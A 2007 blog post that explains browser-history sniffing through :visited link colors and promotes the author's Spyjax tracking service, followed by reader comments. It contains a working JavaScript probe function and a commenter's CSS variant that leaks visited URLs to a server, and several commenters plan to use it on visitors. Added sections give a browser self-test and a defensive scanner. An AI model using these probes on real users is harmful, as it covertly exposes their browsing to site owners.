Spyjax – Your browser history is not private!

by admin on May 23, 2007

If you’re like most web users, you assume that your browser history is private. For example if you visit an online store, you assume they can’t see if you’ve been looking at their competitor. Just a few weeks ago I assumed this was the case. Guess what?

Your browser history is not private!


In fact, with a few well-crafted lines of JavaScript, websites can examine your browser history and record what pages you have been to. Keep reading and I’ll tell you exactly how it’s done and introduce you to a service that any webmaster can put on their site to see what pages their users have visited. I’ll also tell you exactly what type of information can be retrieved, and how you can protect yourself.

How JavaScript Can Be Used To Steal Your Browser History:

With CSS, website designers can make links a different color once the user has visited them. For example, this link should be colored differently from this other link: the first link you have been to before (it’s the page you are on right now), while the second link you have never visited (because it is fictitious). Now you’re thinking, “but how can this be used to steal my history?” Let’s dive a little deeper.

Javascript Can Examine The Color Of Your Links = Steal Your Browsing History

JavaScript can examine the rendered state of an HTML document, called the DOM. One of the properties available through the DOM is the current CSS attributes of a node (nodes are HTML tags, one of which is the <a> or link tag).
All a website has to do to see what pages you’ve been to is place a list of links on the page and examine the color of those links. Ajax can be used to retrieve a list of links to test and also to send the results back to the server without the user ever knowing.
The code to do this examination can be a little tricky due to cross-browser issues. Here is a snippet of JavaScript that can do the evaluation (based on the “Hey you! Where have you been?” blog post by Peter van der Graaf and script from Jeremiah Grossman and Robert Cabri):
<pre>
// Assumes the page's CSS colors visited links red (#ff0000) and unvisited
// links some other color. Returns true if the browser reports the visited
// color for url.
function hasLinkBeenVisited(url) {
    var link = document.createElement('a');
    link.href = url;
    document.body.appendChild(link);
    var visited = false;
    if (link.currentStyle) {
        // Internet Explorer exposes the rendered style through currentStyle
        // (it reports the value as written in the stylesheet)
        visited = (link.currentStyle.color == '#ff0000');
    } else {
        // Firefox, Safari, Opera: ask the DOM for the computed style
        var computed_style = document.defaultView.getComputedStyle(link, null);
        if (computed_style) {
            visited = (computed_style.color == 'rgb(255, 0, 0)');
        }
    }
    // remove the probe link so the test leaves no trace in the page
    document.body.removeChild(link);
    return visited;
}
</pre>

The code above assumes that CSS rules are making links that have been visited red (#ff0000) and new links a different color.
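An added example, not code from the original post, that turns the same check into a browser self-test you can paste into a page’s console, together with a DOM-free model of the two browser generations so the decision logic also runs under Node.js. It assumes nothing else on the page styles links with the two probe colors, and the function names are my own. Browsers since early 2011 (Firefox 4 and Chrome 9, with the other major browsers following) deliberately report the unvisited style from getComputedStyle() and similar APIs, so on a current browser the self-test reports no leak; the model with masksVisited=false reproduces the 2007-era behavior the post describes.

```javascript
// Added example (not code from the original post). A browser self-check that
// reports whether getComputedStyle() exposes :visited state, plus a DOM-free
// model of the two browser generations so the decision logic can be unit-tested.
// Assumption: the probe runs on a page where these two colors are not otherwise
// used for links, so any reported color other than UNVISITED means "visited".
const UNVISITED = 'rgb(0, 0, 255)';
const VISITED = 'rgb(255, 0, 0)';

// Pure decision logic: a URL leaks when the color the browser reports for its
// link differs from the color assigned to unvisited links.
function classifyProbe(reportedColors, unvisitedColor = UNVISITED) {
  const leaked = Object.keys(reportedColors)
    .filter((url) => reportedColors[url] !== unvisitedColor);
  return { leaks: leaked.length > 0, leaked };
}

// Model of what getComputedStyle(a).color returns for each URL.
// masksVisited=false: the 2007-era behavior the post describes (true color).
// masksVisited=true: the 2011+ mitigation, where script-visible style APIs
// always report the unvisited style for links.
function simulateReport(urls, visitedSet, masksVisited) {
  const reported = {};
  for (const url of urls) {
    const visited = visitedSet.has(url);
    reported[url] = visited && !masksVisited ? VISITED : UNVISITED;
  }
  return reported;
}

// Browser part: inject the probe stylesheet, create one anchor per URL, read
// the computed color, and clean up. Run it in a page's console to test a browser.
function probeBrowser(urls) {
  const style = document.createElement('style');
  style.textContent =
    `a.visited-probe:link{color:${UNVISITED}} a.visited-probe:visited{color:${VISITED}}`;
  document.head.appendChild(style);
  const reported = {};
  for (const url of urls) {
    const a = document.createElement('a');
    a.className = 'visited-probe';
    a.href = url;
    a.textContent = url;
    document.body.appendChild(a);
    reported[url] = getComputedStyle(a).color;
    a.remove();
  }
  style.remove();
  return classifyProbe(reported);
}

if (typeof document !== 'undefined') {
  // In a current browser this prints { leaks: false, leaked: [] } even for
  // pages you have visited.
  console.log(probeBrowser(['https://www.google.com/', 'https://example.com/']));
} else {
  // Node.js: show both browser generations against a constructed sample history.
  const urls = ['https://www.google.com/', 'https://example.com/'];
  const history = new Set(['https://www.google.com/']);
  console.log('2007-era browser:', classifyProbe(simulateReport(urls, history, false)));
  console.log('current browser :', classifyProbe(simulateReport(urls, history, true)));
}
```

The probe stylesheet is scoped to a class so it does not disturb the page’s own link colors, and each anchor is removed as soon as its color has been read.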

Ajax Can Be Used To Examine Thousands Of Links Dynamically

A clever web developer can use Ajax to dynamically load a list of links for each new visitor. A couple hundred links can be grabbed at a time and examined without slowing down the page noticeably. If you spend just a few seconds on a website thousands of URLs can be checked.

The Limitations

This technique does not allow sites to read your entire browser history. It only allows a site to test a predefined list of URLs to see if you have visited any of them. It’s like the card game “Go Fish”: you can’t see the other players’ cards, but you can ask them whether they have a particular card. Most likely the way this technology would be used is to examine a list of competing URLs. This could give a website valuable information on who their competitors really are and what information on those sites is being looked at.

How To Stop People From Spying On Your Browser History

There are two sure-fire ways to stop people from stealing your browser history.

  1. The nuclear option is to disable JavaScript within your browser. In Firefox you’d just go to Tools -> Options -> Content tab and then uncheck “Enable JavaScript”. This method is very limiting because you probably enjoy all the JavaScript goodness on the web.
  2. Limit your browser history. The less browser history you store the fewer URLs someone can steal from that history. In Firefox you can change the amount of browser history by going to Tools -> Options -> Privacy and then either uncheck the “Remember visited pages” checkbox or change the number of days that history is stored for.

UPDATE: Spyjax Has Been Turned Off

I will no longer be hosting Spyjax. It’s been fun and very interesting, but it’s time to call it quits. Read more here.

Introducing Spyjax

One Line Of JavaScript And You Can Start Spying


Ok, now that I’ve explained how this all works and how you can protect yourself, I want to introduce you to a small piece of code that I wrote that makes it super easy for you to spy on your website visitors. It’s called Spyjax and here’s how it works.

  1. Sign Up For An Account

    All that’s required is your email address and a password of your choosing. I promise I will not send you any unwanted email or give your email address away to anyone else. Sign Up For Spyjax

  2. Add URLs To Look For

    You can add custom URLs, the top 12 Google results for any search, or just look for the home page of the top 10,000 sites on the web.

  3. Put One Line Of Code At The Bottom Of Your Pages

    A simple <script> tag will insert all the JavaScript needed to spy on your visitors as well as communicate with the Spyjax service to record the results.

  4. Optionally Add A Spyjax Widget To Your Site

    If you just want to have some fun and show people that you’re spying on them you can put one of three Spyjax widgets on your website. There’s one on this site on the right sidebar.

Update: Spyjax Only Gives You Anonymous Data

There have been some concerns raised since I first published this article and released Spyjax. So I just wanted to point out that the service does not link specific websites with identifiable user data. It simply tells you things like “36% of your visitors have been to http://www.google.com/”. Basically, all the data collected by Spyjax is anonymous and shown in aggregate form. Obviously this same technology could be used to track specific users’ history, especially if you’re on a site that records your identity in some way. In my humble opinion it’s much better to debate these issues in the open than to have this sort of technology floating around without people knowing about it.

So You Just Want The Code?

Well I’m not greedy, so I’m giving it away for free. You can do anything you want with it, just don’t blame me if it breaks or gets you in trouble.

You can download the code here: Spyjax Code. It’s got an open source Attribution Assurance License attached to it.

Check out these services by my company MerchantOS:

  • POS Software – A point of sale and inventory control system for small retailers.
  • Bike Shop Point of Sale – A full POS solution specifically designed for independent bicycle retailers.

{ 26 comments }

Kalyan June 1, 2007 at 12:03 am

That was very clever!

WebGyver June 1, 2007 at 6:44 am

OKAY, so if you already know who your “competitors” are, or if you already have a wishlist of links to compare against, I guess all is fine and dandy, right?

If you’re just starting out, perhaps, a good idea to amass some links to compare against with Spyjax would be to grab the referring page (document.referrer) and log that information for a week (or a month, depends on the amount of traffic you get).

Typically, that’s a fairly decent way to gauge what kind of visitor is interested in your web site (although I would be the first to admit that it’s not scientific or necessarily foolproof).

For what it’s worth, and please keep up the good work!

WebGyver

Bob Saget June 1, 2007 at 6:47 am

How about a non-javascript version?

a[href*="yahoo.com"]:visited {background:url(/spyjax.cgi?url=yahoo.com)}

a[href*="google.com"]:visited {background:url(/spyjax.cgi?url=google.com)}
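
As an added example (not part of the original post, the comments or the Spyjax code), here is a small Node.js scanner a site owner or analyst can run over third-party CSS and JavaScript to flag both sniffing patterns on this page: the JavaScript probe from the article, which reads the computed color of dynamically created links, and the script-free CSS variant from the comment above, where a :visited rule carries a url() that the browser fetches only for visited links. The sample CSS and JavaScript inside the block are constructed for the demonstration, and the function names and finding kinds are my own.

```javascript
// Added example (not from the original post or the Spyjax code). A static
// scanner that flags the two history-sniffing patterns discussed on this page:
//  1. CSS: a :visited rule whose declarations contain url(), so the browser
//     fetches a server resource only for links the user has visited.
//  2. JavaScript: a script that creates/sets link elements and reads their
//     computed color (getComputedStyle / currentStyle).
// The sample inputs at the bottom are constructed for the demonstration.

// Minimal CSS rule splitter: strips comments, then yields {selector, declarations}.
// Good enough for flat stylesheets; nested @media blocks are not descended into.
function parseCssRules(css) {
  const noComments = css.replace(/\/\*[\s\S]*?\*\//g, '');
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(noComments)) !== null) {
    rules.push({ selector: m[1].trim(), declarations: m[2].trim() });
  }
  return rules;
}

// Flag :visited rules whose declarations trigger a network fetch.
function scanCss(css) {
  const findings = [];
  for (const rule of parseCssRules(css)) {
    if (!/:visited\b/i.test(rule.selector)) continue;
    if (/url\s*\(/i.test(rule.declarations)) {
      findings.push({ kind: 'css-visited-fetch', selector: rule.selector });
    }
  }
  return findings;
}

// Heuristic for the JavaScript variant: the script must both build or retarget
// link elements and read their computed color. Any one signal alone is common
// in benign code, so all three are required.
function scanJs(js) {
  const readsStyle = /\b(getComputedStyle|currentStyle)\b/.test(js);
  const buildsLinks = /createElement\s*\(\s*['"]a['"]\s*\)|\.href\s*=/.test(js);
  const comparesColor = /\.color\b/.test(js);
  const findings = [];
  if (readsStyle && buildsLinks && comparesColor) {
    findings.push({ kind: 'js-link-color-probe' });
  }
  return findings;
}

// Scan a page's collected assets; returns the list of findings (empty = clean).
function scanAssets({ css = '', js = '' }) {
  return [...scanCss(css), ...scanJs(js)];
}

// Constructed samples: one benign :visited rule, one exfiltrating rule, and a
// probe script shaped like the one in the article.
const SAMPLE_CSS = `
a:visited { color: purple; }                       /* ordinary styling, benign */
a[href*="yahoo.com"]:visited { background: url(/spyjax.cgi?url=yahoo.com) }
`;
const SAMPLE_JS = `
var link = document.createElement('a'); link.href = url;
document.body.appendChild(link);
var c = getComputedStyle(link, null).color;
if (c == 'rgb(255, 0, 0)') report(url);
`;
const BENIGN_JS = `document.querySelector('nav a').href = '/home';`;

console.log(scanAssets({ css: SAMPLE_CSS, js: SAMPLE_JS }));
console.log(scanAssets({ css: 'a:visited{color:purple}', js: BENIGN_JS }));
```

The CSS check is the more reliable of the two, because a url() inside a :visited rule has almost no legitimate use; the JavaScript check is a heuristic and is best treated as a triage signal to be confirmed by reading the flagged script.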

bob saget June 1, 2007 at 7:18 am

Bob Saget, you are missing the point. CSS would only show visited links to the user. They already know what they visited (they are the ones that did it!), so this is pointless. With javascript, you can send this information back to the server, so that the website owner can know where the users have been visiting.

davros June 1, 2007 at 7:44 am

@#8 – no, you’re the one missing the point.

TC June 1, 2007 at 8:02 am

(1) Old.
(2) It *doesn’t* expose your browser history. What you describe, does not do that. You *can’t* write code to tell me what pages I visited before I came to your page.

Davin Studer June 1, 2007 at 8:46 am

#7 makes a good point. You could use css to send back a hit to a server side script with the url in the querystring. I wonder how fast it would be?

buba... June 1, 2007 at 9:46 am

not working with people checking on IE

Tim McCormack June 1, 2007 at 10:31 am

#7’s code doesn’t give you the precise URL, just lets you know that certain domains have been visited.

It is a partial solution.

Also, I’d like to note that the Firefox extension SafeHistory is specifically designed to prevent this exploit, by subjecting “visited”-marking to the browser’s cookie policy. :-)

Aoleon The Martian Girl June 1, 2007 at 1:06 pm

Great job! I will definitely try this myself on my site.

Also it doesn’t seem to work on Safari on the Mac (which is a good thing cause that is the browser I use most) LOL

Bill Hartzer June 1, 2007 at 2:29 pm

Wow, I wasn’t aware that you can get this data. I’ll definitely be experimenting with it, and can only imagine the possibilities of using it with Ajax and some ecommerce sites…

Wodow June 1, 2007 at 4:46 pm

If you are using Firefox, this extension seems to solve the problem:

http://safehistory.com/

Kerouac3001 June 2, 2007 at 1:27 pm

I created the same tool 3 months ago :) but I wrote my article in Italian ( http://www.kerouac3001.com/black-hat-tool-per-interrogare-la-cache-di-un-utente-56.htm ). Here’s the English post of another Italian blogger that talks about this: http://antirez.com/page/cachetest

James Oppenheim June 3, 2007 at 6:42 am

Wow, interesting. There is so much data out there I think my browser history is the least of my problems.

Template Design Wrkshop June 3, 2007 at 9:14 am

Hi
It’s very useful for us to use in blog templates.
Thank you

London SEO June 4, 2007 at 5:40 am

Blimey governor! Didn’t know this was possible, nice one!

Paul Irish June 4, 2007 at 11:14 am
Kevinin June 4, 2007 at 12:28 pm

@Bob Saget:
That is a very good idea! I just wrote my own “version of spyjax”, mine uses a rather simple (and slow) brute force method and I will see how I can implement your idea.

Improbulus June 6, 2007 at 2:13 am

Many thanks for this, very interesting. In terms of defending oneself against this sort of thing, the type and level of control and protection seems to be browser dependent – for instance in Opera deleting a visited page history won’t delete the same page’s visited link history, but you can manually clear just the visited links history.

I’ve experimented and produced a table comparing Opera, Internet Explorer and Firefox – at http://www.consumingexperience.com/2007/06/spyjax-websites-can-see-your-visited.html.

shinobi June 6, 2007 at 8:38 pm

never knew that this stuff exists

TA June 8, 2007 at 1:10 pm

And a lot of you guys are who will eventually make the ‘net so scary that nobody in their right mind will venture there. Reminds me of “Minority Report”.

nick garner July 22, 2007 at 2:10 am

I will be trying this out. I am putting together a big online PR campaign and so I’m going to target competitor search terms. (using seodigger)

with this tool, I will obviously see where users have come from, which means I will tip off the display advertising team, so they can maybe place ads on these sites

I will also do seodigger on these sites and see where they rank, and from that I can also look at the best google territory to target.

and of course when a user actually converts into a sale, I will understand their pathways to my site. from that I can see what works best….very valuable

SEO Articles and Tips March 28, 2008 at 1:06 am

That’s right, but disabling JavaScript is not a good solution, I think.

Vicenza April 19, 2008 at 1:24 am

In this world nothing is private :( thanks for this post demonstrating this.

Vicenza May 8, 2008 at 3:57 pm

Who knows, maybe this site is viewing your browsing history???

clouder May 8, 2008 at 10:46 pm

Firefox users might try tools -> options, Content section, Colors.. button under Font and Colors group, and unchecking Allow pages to choose their own color…, as well as setting link colors to something non standard. Think this could stop the spyjax (too lazy atm to try myself)? Not sure if there is anything you can do about that CSS thing Bob Saget showed. Other than disable CSS which is just out of the question.
